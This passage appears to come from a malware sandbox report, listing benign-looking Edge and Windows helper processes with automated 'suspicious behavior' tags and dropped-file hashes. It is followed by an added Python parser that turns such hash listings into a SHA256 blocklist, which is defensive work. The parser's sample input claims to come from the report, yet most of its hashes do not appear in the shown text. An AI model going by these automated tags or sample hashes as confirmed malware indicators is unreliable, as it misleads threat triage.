      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7372 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 6120)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7780 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3188)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8068 /prefetch:1
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7720 /prefetch:12⤵PID:5008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8404 /prefetch:12⤵PID:4448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7728 /prefetch:12⤵PID:5256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7352 /prefetch:82⤵PID:5272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7996 /prefetch:12⤵PID:4480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1456 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:2168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6616 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4404
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3948
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:444
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x510 0x5181⤵
- Suspicious use of AdjustPrivilegeToken
PID:384
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2312
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5356
Network
MITRE ATT&CK Enterprise v15
Downloads
SHA512d7c9a7cc744a5bc0b2bbb91e497638b7ae9d315ae8ca77291e8fb994556675960a15b2b6b2973171b9c215c97e5f84744dc5a1856cc58a202ff1ff79defd2b04
-
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
(these are the digests of a zero-byte file: the entry records a file that was created but never written to, so its hashes are not usable as indicators)
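Added example, not part of this sandbox report: a parser for the dropped-file hash listing in the flattened form it takes on this page, where a label is fused to its value ("MD5619f71...", "Filesize11KB"), separated from it by a space, or left alone on a line with the value following on the next line. It validates digest lengths, flags entries whose digests are those of a zero-byte file (computed with hashlib rather than hard-coded), and reduces the listing to a deduplicated SHA256 set fit for a blocklist. The class and function names (`DroppedFile`, `parse_listing`, `ioc_sha256s`) are my own, and the sample input is constructed from a few entries on this page with one entry repeated to exercise deduplication.

```python
"""Turn a sandbox 'dropped files' hash listing into a clean IOC set (added example)."""
import hashlib
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Digests of the zero-byte file. A dropped-file entry carrying these values is a
# placeholder (the file was created but never written), not a usable indicator.
EMPTY_DIGESTS = {
    "MD5": hashlib.md5(b"").hexdigest(),
    "SHA1": hashlib.sha1(b"").hexdigest(),
    "SHA256": hashlib.sha256(b"").hexdigest(),
    "SHA512": hashlib.sha512(b"").hexdigest(),
}
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# A listing line: label fused to its value, label and value split by whitespace,
# or a bare label (value on the next line). All three forms occur on the page.
FIELD_RE = re.compile(r"^(Filesize|MD5|SHA1|SHA256|SHA512)\s*(\S.*)?$")
WIN_PATH_RE = re.compile(r"^[A-Za-z]:\\")


@dataclass
class DroppedFile:
    path: Optional[str] = None
    size: Optional[str] = None
    hashes: Dict[str, str] = field(default_factory=dict)

    def is_empty_file(self) -> bool:
        """True if any recorded digest equals the digest of zero bytes."""
        return any(self.hashes.get(a) == d for a, d in EMPTY_DIGESTS.items())

    def well_formed(self) -> bool:
        """Every digest is lowercase hex of the right length for its algorithm."""
        return all(re.fullmatch(r"[0-9a-f]{%d}" % HEX_LEN[a], v) is not None
                   for a, v in self.hashes.items())


def parse_listing(text: str) -> List[DroppedFile]:
    """Split the listing on '-' separators; collect path, size and digests per entry."""
    records: List[DroppedFile] = []
    cur, pending = DroppedFile(), None       # pending: bare label awaiting its value

    def flush() -> None:
        nonlocal cur
        if cur.path or cur.size or cur.hashes:
            records.append(cur)
        cur = DroppedFile()

    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "-":
            flush()
            continue
        if pending is not None:              # value line following a bare label
            if pending == "Filesize":
                cur.size = line
            else:
                cur.hashes[pending] = line.lower()
            pending = None
            continue
        m = FIELD_RE.match(line)
        if m:
            label, value = m.group(1), m.group(2)
            if value is None:
                pending = label
            elif label == "Filesize":
                cur.size = value.strip()
            else:
                cur.hashes[label] = value.strip().lower()
        elif WIN_PATH_RE.match(line):
            cur.path = line
        # any other line is page chrome and is ignored
    flush()
    return records


def ioc_sha256s(records: List[DroppedFile]) -> List[str]:
    """Unique SHA256 values worth acting on: skips empty-file placeholders and bad digests."""
    out: List[str] = []
    for r in records:
        if r.is_empty_file() or not r.well_formed():
            continue
        h = r.hashes.get("SHA256")
        if h and h not in out:
            out.append(h)
    return out


# Constructed sample: entries taken from this report's listing in the three line
# forms seen on the page, one entry repeated, plus the zero-byte-file entry.
SAMPLE_LISTING = """\
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
-
C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ccba5a5986c77e43.customDestinations-ms
Filesize11KB
MD564a52b81eebb07f52e1a1678989f3246
SHA256bf227675280b4ec00fe7d6598aaa105ae33519962689e58d5f7cc0f33f22e063
-
Filesize 458KB
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
"""

if __name__ == "__main__":
    recs = parse_listing(SAMPLE_LISTING)
    for r in recs:
        tag = "EMPTY " if r.is_empty_file() else ""
        print(f"{tag}{r.size or '?':>6}  {r.hashes.get('SHA256')}  {r.path or ''}")
    print("IOC SHA256 set:", ioc_sha256s(recs))
```

The empty-file digests are derived at import time rather than pasted in, so the check stays correct even if someone later extends `EMPTY_DIGESTS` with another algorithm; the length check catches the most common copy-and-paste damage in hash lists (a truncated or doubled digest) before it reaches a blocklist.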